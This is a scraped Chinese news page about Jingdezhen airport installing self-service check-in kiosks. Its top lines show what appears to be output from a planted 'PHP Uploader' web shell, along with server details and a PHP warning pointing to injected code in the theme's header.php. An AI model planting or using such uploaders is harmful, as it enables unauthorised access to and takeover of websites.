PHP Uploader - By Phenix-TN & Mr.Anderson
Linux iZwz91hdhujjzqy9icuvwuZ 5.4.0-31-generic #35-Ubuntu SMP Thu May 7 20:20:34 UTC 2020 x86_64
okokok/www/wwwroot/aircn/new_wordpress/wordpressokokok
Warning: Use of undefined constant itongtong - assumed 'itongtong' (this will throw an Error in a future version of PHP) in /www/wwwroot/aircn/new_wordpress/wordpress/wp-content/themes/newsbulk/header.php(29) : runtime-created function on line 1

为持续提升旅客出行体验,满足旅客需求。近日,景德镇机场在候机楼新增两台自助值机设备。

自助值机设备于10月25日运至景德镇机场,经过南昌凯亚及华东凯亚工程师的调试于10月26日正式运行,此次自助值机设备的上线运行进一步缓解了高峰期值机柜台的压力,为旅客出行打造了一条绿色值机通道,有效的帮助了旅客快速乘机,便捷出行。设备运行前,地面服务部对新设备进行了风险评估并由凯亚工程师对自助值机的操作、登机牌物料的添加进行了现场培训。

自助值机的增加弥补了景德镇机场自助服务功能的缺失的问题,也丰富了旅客值机选择方式、提高了旅客值机效率,同时也是景德镇机场朝“智慧机场”迈出的重要一步。

来源:中国民航网,通讯员:叶敏 报道

作者 一潼

发表回复